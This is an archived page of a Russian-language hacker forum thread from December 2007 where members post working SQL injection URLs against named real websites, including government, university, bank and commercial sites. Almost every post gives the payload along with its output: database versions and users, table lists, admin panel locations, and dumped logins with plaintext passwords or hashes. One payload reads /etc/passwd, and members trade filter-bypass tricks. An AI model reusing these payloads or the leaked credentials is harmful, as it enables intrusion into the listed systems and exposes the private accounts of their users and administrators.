SQL Инъекции [Архив] - Страница 17

5taY3r

11.12.2007, 18:53

www.heritage.gov.my
скуля:http://www.heritage.gov.my/kekkwa/viewbudaya.php?id=-3377+union+select+version(),2,3,4,5,6,7/*&stdout=1&PHPSESSID=cdc19ca65de6fe5b3d27592190423d835.0.45
таблицы:http://www.heritage.gov.my/kekkwa/viewbudaya.php?id=-3377+union+select+TABLE_NAME,2,3,4,5,6,7+FROM+INFO RMATION_SCHEMA.TABLES/*&stdout=1&PHPSESSID=cdc19ca65de6fe5b3d27592190423d83инте ресные:
'buku_tamu'-'nama'(логин),'emel'(мыло)
'pentadbir' -'nama'(логин админов),'katalaluan'(пасс админов)...
в названиях чуть голову не сломал...)http://www.heritage.gov.my/kekkwa/viewbudaya.php?id=-3377+union+select+COLUMN_NAME,2,3,4,5,6,7+FROM+INF ORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=char(112, 101,110,116,97,100,98,105,114)/*&stdout=1&PHPSESSID=cdc19ca65de6fe5b3d27592190423d83

логин:пасс
nanie:9dRozi0uyhUnE
zuraihan:f0tjlY5WLfiik
murugan:murugan
anishariah:$1$4FXU.gOL$IGKdSMr1BYdgIz3lMJMFH1

админка:http://www.heritage.gov.my/kekkwa/webadmin/index.php

~EviL~

11.12.2007, 21:10

http://www.dmsbg.com/projects_details_actual.php?id=-39+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11/*

Не смог подобрать имена таблиц. Я завещаю вам продолжить мое благородное дело :D

Ded MustD!e

11.12.2007, 21:31

http://www.thaitextile.org/ - Тайландский Институт Текстиля :D

http://www.thaitextile.org/member/about.asp?member_id=1+or+1=(SELECT+TOP+1+cast(shor tname+as+nvarchar)%2B%27%3A%27%2Bcast(passwd+as+nv archar)+from+member_list)--

kair

11.12.2007, 21:41

Программа: MWOpen E-Commerce
http://www.infiera.net/leggi_commenti.asp?id=2489999+union+select+null,nu ll,password,nome,null,data,null+from+utenti+where+ Admin=true

Administrator jonesjones

ЛифчиС5СВ

11.12.2007, 22:49

Чешский бейсбольный клуб "Черные совы".
www.univka.cz

Пришлось юзать cast() =)
http://www.univka.cz/index.php?inc=news.php&id=-162+union+select+1,2,3,concat_ws(char(58),cast(ver sion()+as+binary),cast(user()+as+binary),cast(data base()+as+binary)),5
Version: 4.1.11-Debian_4sarge2banan-log
User: univka.cz@localhost
Database: univka_cz

5taY3r

11.12.2007, 23:00

www.wycliffecollege.cahttp://www.wycliffecollege.ca/section.php?aid=8+union+select+concat_ws(0x3a,vers ion(),user(),database()),2/*&sid=384.1.11-standard-log:wycliffe@localhost:wycliffe

Momiji

12.12.2007, 05:05

www.ieee.bg
http://www.ieee.bg/index.php?page=-1'+union+select+1,2,concat(version(),0x3,user(),0x 3,database()),4/*
Version: 4.1.22
User: wwwieee@localhost
Database: ieee

[aywo]

12.12.2007, 15:08

сайт:http://www.bit-info.pl
http://www.bit-info.pl/baza.php?g=999999999;select+user,passwd,3+from+PG_ shadow+limit+2+offset+0--
Версия: PostgreSQL 7.3.4 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 3.3.1 (SuSE Linux)

Пользователь: postgres

Таблицы в базе:
pg_description
pg_group
pg_proc
pg_rewrite
pg_xactlock
pg_type
pg_attribute
pg_class
pg_inherits
pg_index
pg_operator
pg_opclass
pg_am
pg_amop
pg_amproc
pg_language
pg_largeobject
pg_aggregate
pg_trigger
pg_listener
pg_cast
pg_namespace
pg_shadow
pg_conversion
pg_depend
pg_attrdef
pg_constraint
pg_database
pg_statistic
grupydzialy

SWAT

12.12.2007, 18:01

http://www.smotri.te.ua/index.php?inc=catalog&under=-6124+union+select+1,concat(nick,0x3a,passwd,0x3a,e mail),3,4+from+users/*

ZAMUT

12.12.2007, 18:17

vrlknowledgebank.com
http://www.vrlknowledgebank.com/reportinfo.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,AES_DECRYPT (AES_ENCRYPT(version(),0x71),0x71),13,14,15,16,17, 18,19,20,21,22,23+--+&page=34.1.12a-nt-log
http://www.vrlknowledgebank.com/reportinfo.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0 x3a,AES_DECRYPT(AES_ENCRYPT(user,0x71),0x71),AES_D ECRYPT(AES_ENCRYPT(password,0x71),0x71)),13,14,15, 16,17,18,19,20,21,22,23+from+mysql.user+limit+1,1+--+&page=3
root:*95949BC5A05704CCF5AD7AE3198DA335047385E9
admin:131d71e529a05785

SWAT

12.12.2007, 20:07

http://www.futerracom.org/auto.php?inc=team&staff_id=-1+union+select+1,VERSION(),3,4,5,6,7/*

Underwit

12.12.2007, 22:03

www.vfs.com
http://www.vfs.com/showcase.php?id=-1+union+select+1,2,TABLE_NAME,4+from+INFORMATION_S CHEMA.TABLES/*
webmaster@localhost
vfscom_db
5.0.22-standard-log

Reverse-ip - PR
GAMEDESIGNEXPO.COM - 4
GEKKOFILMS.COM - none
MYVFS.COM - none
THEWEBCAFE.COM - 7
VANCOUVERFILMSCHOOL.COM - 7
VFS.COM - 7
VFSLIVE.COM - none
VFSTOPGUNS.COM - none
YOURVFS.COM - none

www.uselessjunk.com

http://www.uselessjunk.com/article_full.php?id=-1+union+select+1,2,3,4,5,concat(fld_username,0x3a, fld_password),7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23+from+tbl_admin+limit+4,1/*

users:
1:rich:tigger
2:hoover:tigger
3:jill:tigger
61:shawing:ilikepie
21:roninx42:skydog69

www.bmoca.org

http://www.bmoca.org/artist.php?id=-1+union+select+1,2,3,4,TABLE_NAME,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25+from+INFOR MATION_SCHEMA.TABLES+LIMIT+16,1/*

bd:
aboutUs
artists
contactUs
education
events
reservation
sessions
lm_user_groups
lm_user_list
orders
users
evo_users

columns:
username
password

users:
bmoca:bm0c@

www.igert.neu.edu

http://www.igert.neu.edu/students/profile.php?pid=-1+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database()),4/*

edtech@localhost
4.1.10a
igert

$dbHost = "instruct.coe.neu.edu";
$dbUsername = "G250lleccia";
$dbPassword = "cia749";
$dbName = "G250lleccia";

rootpath:/server/ns-home/docs/igert/students/

mysqluser:
a.comer:*3918CBD388D14A1CC4408F7F8A633115AC4C808D: dennis

http://www.igert.neu.edu/students/profile.php?pid=-1+union+select+1,2,load_file(0x2F6574632F706173737 764),4,5,6,7,8,9/*

Momiji

13.12.2007, 01:54

psile.com
http://www.psile.com/index.php?page=catalog_details&CID=-1'+union+select+1,concat(version(),0x3,user(),0x3, database()),3,4,5,6,7,8/*
Version: 4.1.20
User: nexus@localhost
Database: nexus
Не смог подобрать имена таблиц(

159932

13.12.2007, 02:56

phparchitecture.com

http://www.phparchitecture.com/howto_show.php?id=200+union+select+1,2,3,4,6/*

Version: 4.0.17
User: serge@localhost
Database: serge

тиблицы не ковырял

159932

13.12.2007, 03:05

http://auroraforum.org/events.php?id=4900+union+select+1,2,3,4,5,6,7,8,9, 0,1,5,1,4,5,6/*
вот

sabe

13.12.2007, 05:36

одна из моих:
http://www.russianfeme.com/russianbrides/bride.htm?l=e&id=6941337+union+select+1,version(),3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,27 ,28,30,31,32,33,34,35,36,37/*

vp$

13.12.2007, 07:31

одна из моих:

раскрутил))

http://www.russianfeme.com/russianbrides/bride.htm?l=e&id=6941337+union+select+1,concat_ws(0x3a,name,pass word,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,27,28,30,31,32,33,34,35,36 ,37+from+menprofiles+limit+3,1/*
http://www.russianfeme.com/russianbrides/bride.htm?l=e&id=6941337+union+select+1,concat_ws(0x3a,name,pass word,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,27,28,30,31,32,33,34,35,36 ,37+from+womenprofiles+limit+3,1/*

Spyder

13.12.2007, 14:27

Yahoo.com
http://www.widgets.yahoo.com/gallery/view.php?widget=13+union+select+user,2,3,password, host,6,7,8,9,10,11,12,13+from+mysql.user/*

рут без пасса =\

159932

13.12.2007, 14:51

http://www.milim.com/news.php?id=1000+union+select+1,2,3,4,5,6,7,8/*
4.1.19-log:::db_milim:::db_milim@localhost

Spyder

13.12.2007, 15:00

http://rfe.org/showCat.php?cat_id=-13+union+select+1,2,3,4,5,6,cast(version()+as+bina ry),8,9,10,11,12,13/*
qwe

Spyder

13.12.2007, 15:13

AOL
http://ted.aol.com/category.php?catID=3-23+union+select+1,cast(version()+as+binary),3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*
www.devmaster.net
Разработченги игр
http://www.devmaster.net/articles.php?catID=-2+union+select+1,convert(concat_ws(0x3a,username,p assword,salt)+using+latin1)+from+vb_user+limit+1,2
>8K юзеров. Выводится всё списком, но все записи не выводит, страинца просто не грузистя из-за большого размера
+)

159932

13.12.2007, 18:28

www.coolrivercafe.com

http://www.coolrivercafe.com/location.php?c=121+union+select+1,2,3,4,5,6,7,8,9, 0,1,2,3,4,5,6,7,8,9,0,1/*

ver:4.1.20
usr:croinc@69.36.64.112

4Dfx

13.12.2007, 21:05

http://www.rch.org.au/dentistry/research.cfm?doc_id=-3601+union+select+1,2,3,4,concat_ws(0x3a,user_name ,user_pwd),6+from+users+limit+0,1/*

ZAMUT

13.12.2007, 21:40

Citizens Bank of ADA
citizensada.com
http://citizensada.com/dyn/showpage.php?id=27'+union+select+1,concat_ws(0x3a, version(),user(),database()),3,4,5,6,7,8,9,10,11,1 2+--+ 4.1.20:admin@localhost:dyn_citizensada
http://citizensada.com/dyn/showpage.php?id=27'+union+select+1,concat_ws(0x3a, User,password),3,4,5,6,7,8,9,10,11,12+from+mysql.u ser+limit+1,1+--+
admin:229f047c0c8624dc
pma_oOWTscKh8rAQ:17141ad54791816d
horde:74d7af8f330f2189
greg111667:1c2f7e091b2a6b36
emailadmin:319a703529b946a8
thomasrpack:420898473264d01a
mysqlbackup:319a703529b946a8
blabla:319a703529b946a9

159932

13.12.2007, 22:04

www.autosavecomponents.co.uk/shop/
http://www.autosavecomponents.co.uk/shop/choose_model.php?manID=000+union+select+1,2+from+u sers/*

табла - users
колонок не вижу
4.1.22-standard:autosave_store:autosave_goldfis@localhost

[aywo]

13.12.2007, 22:20

galaxie.com
http://www.galaxie.com/category.php?scid='&category_id=-1+union+select+user,password,3+from+mysql.user/*
верся:4.1.13a-nt
пользователь:root@localhost
база:galaxiecmsphp
root:67b240e4309aa0de

5taY3r

13.12.2007, 22:29

www.monica-companys.comhttp://www.monica-companys.com/product.php?id_product=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3/*5.0.22-Debian_0ubuntu6.06-log:monicaco@localhost:monicaco2
http://www.monica-companys.com/product.php?id_product=-1+union+select+1,concat_ws(0x3a,user_id,username,u ser_password),3+from+phpbb_users+limit+2,1/*2:Fraggle:95248cc32e30d7910d048267d7326c81
3:monica:ff0d813dd5d2f64dd372c6c4b6aed086:monica

159932

13.12.2007, 22:35

innovateonline.info
http://innovateonline.info/index.php?view=article&id=4600+union+select+1,2/*
5.0.24a-community-nt:::innovate:::innovate@localhost

впадлу дальше смотреть там только через лимит можно ...

www.uazmadi.ru
http://www.uazmadi.ru/news.php?news_id=-%201+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11/*
5.0.37-log:avtomoto:avtomoto@localhost

тут тоже только через лим

v1ru$

13.12.2007, 23:00

innovateonline.info

впадлу дальше смотреть там только через лимит можно ...

Далеко не только...

http://innovateonline.info/index.php?view=article&id=4600+union+select+concat(person,0x3a,password), 2+from+innovate.person_account+limit+25,1/*

159932

13.12.2007, 23:04

www.retrojunk.com
http://www.retrojunk.com/user/view_profile.php?uid=000+union+select+1,2,concat(u sername,char(58),password),4,5,6,7,8,9,0,1,2,3,4+f rom+user_profile+limit+0,1/*
5.0.27-standard:retro_retro:retro_retro@localhost
только через лим
примерно 6.7к юзеров (в базе логины пассы и мыла) пассы под md5

Solide Snake

13.12.2007, 23:15

Эстонский сайтик riik.ee :)

hXXp://www.riik.ee/ab/cgi/naita_person.py?person_id=- 5363+union+select+version(),null,null,null,null,nu ll,null,null,null,null,null,nu
ll,null--%20&nomenu=1

159932

13.12.2007, 23:30

www.kb-jardin.com
http://www.kb-jardin.com/page.php?rub=3&idproduit=00+union+select+1,2,table_name,4,5,6,7,8 ,9,0,1,2,3,4,5,6+from+information_schema.tables+li mit+31,1/*
5.0.24a-Debian_9~bpo.1-log:nod-1070base:nod-1070@localhost
через лим
31таблица

-------------------------------------------------
www.sosna.ru
http://www.sosna.ru/?nid=000+union+select+1,2,3,4,table_name,6+from+in formation_schema.tables+limit+38,1/*
5.0.45-log:u71952_sosna_ru:u71952@10.10.223.224
через лим
38 таблиц
http://www.sosna.ru/admin

159932

13.12.2007, 23:40

www.canalti.com.pe
http://www.canalti.com.pe/noticias/contenido.php?ID=670000&IDs=000+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 ,6/*
4.1.22-standard:canalti_dbcanalti:canalti_canalti@localho st
http://www.canalti.com.pe/admin

159932

13.12.2007, 23:57

stanford.edu
http://www.stanford.edu/group/blackink/cgi-bin/article?n=4700+union+select+1,2,3,4,5,6,7,8,9,0,1, 2,3,4,5,6,7/*
5.0.32-Debian_7etch1-log:g_blackink_article:gblackinkarticl@www4.Stanfo rd.EDU
22 таблцы
вот ещё интересное - http://rosebud.stanford.edu/test.php

Momiji

14.12.2007, 00:00

wolfgreenfield.com
http://www.wolfgreenfield.com/index.php?page=newsstand&sub=display&id=999999+union+select+1,concat_ws(0x3,user,passwo rd),concat_ws(0x3,user(),database(),version()),4,5 ,6,7+from+mysql.user+--+
User: wgs@localhost
Version: 4.0.12
Database: pnc_wolfgreen
root:79f68a341bc4fa6e:c3l1ne

halkfild

14.12.2007, 01:46

lumen.ws
«LUMEN» - ГРУППА 2007 ГОДА!

http://www.lumen.ws/shop_popup.php?id=15+and+1=1/*'
http://www.lumen.ws/shop_popup.php?id=15+order+by+8/*'
http://www.lumen.ws/shop_popup.php?id=15+and+(ascii(substring(VERSION( ),1,1))=51)/*'
www/vhosts/lumen.cd/html/

p.s. жалко мускул 3 =\

и украинские панки

punk.org.ua
база всех пользователей и тд)))
http://punk.org.ua/bands/detail.php?id=-476+union+select+1,2,concat_ws(0x3a3a,login,passwo rd),4,5,6+from+users/*'

з.ы. база большая))

159932

14.12.2007, 14:05

www.bustur.ru
http://www.bustur.ru/t.php?id=0+union+select+1,2,3,column_name+from+inf ormation_schema.columns/*
274 таблицы . все визибл .в mysql.user не попасть ...
http://www.bustur.ru/t.php?id=0+union+select+1,2,3,concat(login,0x3a,pa ssword)+from+options/*
eurotour:tdhjflv
админку не нащёл (((

159932

14.12.2007, 15:08

http://support.jgaa.com/
5.0.32-Debian_7etch1-log:WarSupport:support@82.134.90.242
http://support.jgaa.com/index.php?cmd=ShowProduct&ID=00+union+select+1,2,3,4,5,6,7/*
http://support.jgaa.com/index.php?cmd=ShowProduct&ID=00+union+select+1,column_name,3,4,5,6,7+from+in formation_schema.columns+where+table_name=0x557365 72/*

база на 9.5к юзеров

159932

14.12.2007, 16:28

radiodialect.net
http://radiodialect.net/index.php?cmd=blog&blogId=16200+union+select+1,2,3,4,5,6,7/*
5.0.32-Debian_7etch1-log:radiodialect:radiodialect@localhost
admin - tonyg
hesh:faadbe3c7e2e36a26164dbcf0d201d37:bilder

ElteRUS

14.12.2007, 18:17

http://www.agnuz.info/?a=holy&father=benedict&id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x2F,cast(v ersion()+as+binary),cast(database()+as+binary),cas t(user()+as+binary)),9,10/*

4.1.11/test/agnuz_base@localhost

-----------------------------------------------------------------------------

http://www.alphar.ru//?tm=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5/*

4.0.27-max-log/alphares/alphares@v5.valuehost.ru

-----------------------------------------------------------------------------

http://articles.astrakhan.info/?show=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6,8,9/*

4.0.25/wwwastrakhanlggr/astrak01@hux.hc.ru

159932

14.12.2007, 18:56

http://www.londonsalsa.co.uk/clubNight.php?clubNightID=78+union+select+1,2,3,4, 5,6,7,8,9,0,1,2,3/*
4.1.21-log:londonsalsa_co_uk:londonsalsa_co_uk@192.168.1. 32

.................................................. ......................

http://enworld.cyberstreet.com/cc/faq/answer.php?faqID=1+and+1=0+union+select+1,2,3/*
4.0.23a-log:CreatureCatalog:ScottGreene@localhost

Mobile

14.12.2007, 20:54

от меня чуть-чуть...
http://www.classicstyle.de/product_view.html?lang=en&loc=eu&artikel_id=9999999+union+select+1,2,convert(versio n(),binary),4/*

min7

14.12.2007, 22:48

http://www.brusel.com/site/affpage.php?m=11&evenement=-164+union+select+1,concat_ws(char(58,58),user(),da tabase(),version()),3,4,5,6,7,8,9/*
brusel_user@localhost::brusel_com::4.1.22-standard

http://www.afai.fr/index.php?m=-278+union+select+concat_ws(char(58,58),user(),data base(),version()),2,3/*
assoafai@193.25.197.203::assoafai_1::4.1.22-standard

http://www.amgroupes.fr/manif.php?m=-87+union+select+1,concat_ws(char(58,58),user(),dat abase(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23/*
dbo207862981@212.227.114.159::db207862981::4.0.27-standard-log
Таблиц нигде не нашёл..

159932

14.12.2007, 22:59

policy.lv
http://www.policy.lv/board.php?t=topic&i=1163150+union+select+1,2,3,4/*
http://www.policy.lv/board.php?t=topic&i=1163150+union+select+1,concat(username,char(58), password),3,4+from+user/*
4.0.18-STANDARD:POLIT_EN:SOROS@LOCALHOST
Некоторые юзвери
admin:1
kbi:helpme
админку в упор не вижу

159932

14.12.2007, 23:17

http://www.tricitysra.org/display?help=Information&topic='+union+select+1,2,3,4,5,6,7,8,9,0,1,concat( version(),char(58),database(),char(58),user()),3,4 ,5/*
4.1.20:tri:tri@localhost

159932

14.12.2007, 23:39

mojduniya.com
http://www.mojduniya.com/picdetail.php?catId=33&tid=00+union+select+1,2,concat(username,0x3a,passw ord),4,5+from+admin/*
4.1.20:db_md:maarab_md@localhost

login:maarab
pass:mygugly_md
де админка не ипу ..

SWAT

15.12.2007, 02:29

http://spaceshop.ru/index.php?page=info&id=-869+union+select+1,email,3,4,5,6,7,8,9,10,11,12+fr om+forum/*

http://xbox360.freeki.es/detalle_noticia.php?id=-1317+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1/*

mr.The

15.12.2007, 16:30

http://www.a2k.org.ua/news.php?id=-1+union+select+1,2,3,4,user,password,email,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38+from+users/*&lng=ua

де админка хз.

Ponchik

15.12.2007, 19:36

old.lipstick.ru
Сначало логинимся лоин и пасс 'Or 1=1/*
ПОтом идём сюда
http://old.lipstick.ru/smscenter.php?view=-1+UNION+SELECT+1,2,3,4,concat(username,0x3a, password),6,7+FROM+users+LIMIT+0,1/*
admin:399a2ece6b34ff6e314d87301af489f0
Версия 4

В админку не попасть, проблема с хэдэрами :mad:

5taY3r

15.12.2007, 19:40

http://www.bmeia.gv.at/templates/popup.php3?f_id=155&LNG=de&version=&BildID=-189+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15/*Чего-то дальше не крутится...(

4Dfx

15.12.2007, 21:13

http://www.bmeia.gv.at/templates/popup.php3?f_id=155&LNG=de&version=&BildID=-189+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15/*Чего-то дальше не крутится...(

Там фильтруются входящие данные пробуй AES_DECRYPT AES_ENCRYPT http://www.bmeia.gv.at/templates/popup.php3?f_id=155&LNG=de&version=&BildID=-189+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,AES _DECRYPT(AES_ENCRYPT(version(),0x71),0x71),15/*

v1ru$

15.12.2007, 21:24

Там фильтруются входящие данные пробуй AES_DECRYPT AES_ENCRYPT http://www.bmeia.gv.at/templates/popup.php3?f_id=155&LNG=de&version=&BildID=-189+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,AES _DECRYPT(AES_ENCRYPT(version(),0x71),0x71),15/*

http://www.bmeia.gv.at/templates/popup.php3?f_id=155&LNG=de&version=&BildID=-189+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, aes_decrypt(aes_encrypt(concat(user,0x3a,password) ,0x71),0x71)+from+mysql.user/*

root:*DE342DA364B639606FF4447B24338C1318FB181C:pse udo

5taY3r

15.12.2007, 21:56

http://www.bmeia.gv.at/templates/popup.php3?f_id=155&LNG=de&version=&BildID=-189+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, aes_decrypt(aes_encrypt(concat(user,0x3a,password) ,0x71),0x71)+from+mysql.user/*

root:*DE342DA364B639606FF4447B24338C1318FB181C:pse udo
http://www.bmeia.gv.at/robots.txt
админка:_https://cms.bmeia.gv.at/truman/index.php3
логин/пароль не катят...

v1ru$

15.12.2007, 22:13

http://www.bmeia.gv.at/robots.txt
админка:_https://cms.bmeia.gv.at/truman/index.php3
логин/пароль не катят...
так это пасс к БД)

5taY3r

15.12.2007, 22:28

так это пасс к БД)
Да я в курсе...) Решил на авось попробовать, не прокатило...

Ded MustD!e

15.12.2007, 23:26

http://www.aziendeinvista.it/

http://www.aziendeinvista.it/view_news.asp?id=-1+union+select+1,concat_ws(0x3a,Passw,Admin),3,4,5 ,6,7+from+admin--

http://www.tissuper.com.au/

http://www.tissuper.com.au/newsline/view_news.asp?id=1+or+1=(SELECT+TOP+1+cast(usernam e+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvar char)+from+admin_user)--

Tyc00n

15.12.2007, 23:43

http://www2.umaine.edu/graduate/article.php?id=-999'+union+select+1,version(),user(),4/*
version() - 4.1.20

user() - jwef@localhost

5taY3r

15.12.2007, 23:56

www.avem.frhttp://www.avem.fr/news?id=-0303+union+select+1,2,3,4,concat_ws(0x3a,version() ,user(),database()),6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23/*4.0.25-standard-log:avemlfod@10.0.70.5:avemlfod

Saint-Sky

16.12.2007, 00:49

2 Tyc00n

Попробуй этот запрос:
http://www2.umaine.edu/graduate/article.php?id=-999'+UNION+SELECT+1,concat(username,0x3a,password) ,3,4+from+users+limit+0,1/*

MegaBits

16.12.2007, 01:09

http://www.neurope.eu/view_news.php?id=-1+union+select+1,USER(),VERSION(),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,DATABASE(),31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 ,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,7 5,76,77,78,79,80/*
neweuro_kostas@localhost
4.1.22-standard
neweuro_corporate

Saint-Sky

16.12.2007, 01:23

http://wap.freesoft.ru/get_file.wap.wml?id=99999'+UNION+SELECT+1,2,3,4,5/*

get@localhost:get:4.1.14

Ded MustD!e

16.12.2007, 02:14

http://www.starww.com/

http://www.starww.com/view_news.asp?id=1+or+1=(SELECT+TOP+1+cast(Email+a s+nvarchar)%2B%27%3A%27%2Bcast(UserPass+as+nvarcha r)+from+AccountMaster)--

Saint-Sky

16.12.2007, 12:34

atlas.cz

Не знаю - было или нет... Доступ из нужных - только к Zabava

http://wap.atlas.cz/tv.asp?id=-99+UNION+SELECT+name,2+from+master..sysdatabases--

4Dfx

16.12.2007, 17:45

http://www.reusablebags.com/facts.php?id=-1+union+select+1,2,version(),user(),5,6,7/*

Ded MustD!e

16.12.2007, 18:23

http://www.athletesadvance.com/

http://www.athletesadvance.com/sample_profile.asp?view_id=1+or+1=(SELECT+TOP+1+ca st(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+ as+nvarchar)+from+admins+where+admin_id=1)--

4Dfx

16.12.2007, 18:28

http://www.sufficiencyeconomy.org/show.php?Id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12 ,13,14,15+from+information_schema.tables/* Далее пользуемся лимитом P.S. Интересные таблички - useradmin, member, PROFILING

.Begemot.

16.12.2007, 18:47

http://www.salienagolf.lv/?pane=nxt&lang=1&gid=22&n=1+union+select+0,convert(concat(USER(),VERSION() ,DATABASE())+using+latin1),2,3,4,5,6,7,8,9,10,11,1 2/*

USER:salienagolfcom@localhost
VERSION:4.1.18
DATABASE:salienagolfcom

halkfild

16.12.2007, 19:01

http://www.fllandforsale.biz/email_rep.php?id=4/*'
http://www.fllandforsale.biz/email_rep.php?id=4+and+1=1/*'

http://www.fllandforsale.biz/email_rep.php?id=4+order+by+22/*'

http://fllandforsale.biz/searchRegions.php?pType=3/*
http://fllandforsale.biz/searchRegions.php?pType=3+and+1=1/*
http://fllandforsale.biz/searchRegions.php?pType=3+order+by+1/*

http://fllandforsale.biz/showListing.php?type=property&id=348+and+1/*
http://fllandforsale.biz/showListing.php?type=property&id=348+order+by+4/*

http://www.fllandforsale.biz/email_rep.php?id=-4+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,versio n(),user(),database()),8,9,0,11,12,13,14,15,16,17, 18,19,20,21,22
4.1.20::h7t6Y54@localhost::flland

p.s. версия 4-ка и легким брутом таблици не подобрал, читать тоже прав нет

http://www.epdlp.com/clasica.php?id=397+and+1=1/*'
http://www.epdlp.com/clasica.php?id=397+order+by+14/*'
http://www.epdlp.com/clasica.php?id=397+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14/*'

http://www.epdlp.com/clasica.php?id=397+union+select+1,2,concat_ws(0x3a 3a,version(),user(),database()),4,5,6,7,8,9,10,11, 12,13,14/*'
5.0.45::epdlp@208.109.86.144::epdlp

http://www.epdlp.com/clasica.php?id=397+union+select+1,2,convert(concat _ws(0x3a3a,table_name,column_name)+using+latin1),4 ,5,6,7,8,9,10,11,12,13,14+from+information_schema. columns+where+table_name=''+limit+100,11/*'

clasica::top100
clasica::obra
clasica::nommusico
clasica::apemusico
clasica::fecha

http://www.epdlp.com/clasica.php?id=397+union+select+1,2,convert(concat _ws(0x3a3a,table_name,column_name)+using+latin1),4 ,5,6,7,8,9,10,11,12,13,14+from+information_schema. columns+where+table_name='clasica'+limit+1,4/*'

texto::apeautor
http://www.epdlp.com/clasica.php?id=397+union+select+1,2,convert(concat _ws(0x3a3a,table_schema,table_name,column_name)+us ing+latin1),4,5,6,7,8,9,10,11,12,13,14+from+inform ation_schema.columns+where+column_name+like+'%mail %'+limit+1,2/*'
http://www.epdlp.com/clasica.php?id=397+union+select+1,2,convert(concat _ws(0x3a3a,table_schema,table_name,column_name)+us ing+latin1),4,5,6,7,8,9,10,11,12,13,14+from+inform ation_schema.columns+where+table_name='felicitacio nes'/*'

felicitaciones
epdlp::felicitaciones::comentario
epdlp::felicitaciones::ID
epdlp::felicitaciones::anio
epdlp::felicitaciones::mes
epdlp::felicitaciones::fecha
epdlp::felicitaciones::dia
epdlp::felicitaciones::hora
epdlp::felicitaciones::email
epdlp::felicitaciones::contenido

p.s. версия 5-ка таблиц много можете поискать что-то)) /*прав читать файлы нет =\*/

SWAT

16.12.2007, 20:26

http://ted.aol.com/index.php?ID=-1241+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20/*

halkfild

16.12.2007, 20:55

megаmaх.ua
PR=4

сеть супермаркетов техники

http://www.megаmaх.ua/ru/index.php?page=product&url=more&tovar_id=13677+and+1=1/*'
http://www.megаmaх.ua/ru/index.php?page=product&url=more&tovar_id=13677+order+by+26/*'
http://www.megаmaх.ua/ru/index.php?page=product&url=more&tovar_id=-13677+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26/*'
http://www.megаmaх.ua/ru/index.php?page=product&url=more&tovar_id=-13677+union+select+1,2,3,4,5,concat_ws(0x3a3a,vers ion(),user(),database()),7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26/*'
4.0.27-standard::megаmax@tom.kiev.sovam.com::megamax

кто подберет таблицу и поля с меня +))

SWAT

16.12.2007, 21:25

удалено! баян

0nep@t0p

16.12.2007, 21:30

WWW.PRIVATE.COM
http://www.private.com/clips/index.php?clip_category_id=-16%20union%20select%201,2,3,table_name,5,6,7,8,9%2 0from%20information_schema.tables/*
Версия: 5.0.44-LOG

WWW.ADAGE.COM
http://www.adage.com/adages/post.php?article_id=-122080+union+select+1,convert(concat(user,0x3a,pas sword),binary),3,4,5,6,7,8,9,10+from+mysql.user/*
Версия: 4.1.15-emic-2.7.1-121-log
Юзер: adage@localhost
http://www.adage.com/phpmyadmin
adage: aa179
trey: trey
Также логин: пасс trey: trey подходят к админке - http://www.adage.com/admin

WWW.AAJ.TV
http://www.aaj.tv/programme/index.php?pg=entertainment'&pid=-128+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,concat_ws(0x202d20,user_name, user_id,user_password),23,24,25+from+users/*
Версия: 4.0.27-log
Юзер: aajtv@localhost

Есть доступ к mysql.user

WWW.THEPALMERFOUNDATION.ORG
http://www.thepalmerfoundation.org/default.asp?id=5'+or+1=(select+top+1+cast(username +as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarc har)+from+users+where+id=4)--
Версия: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
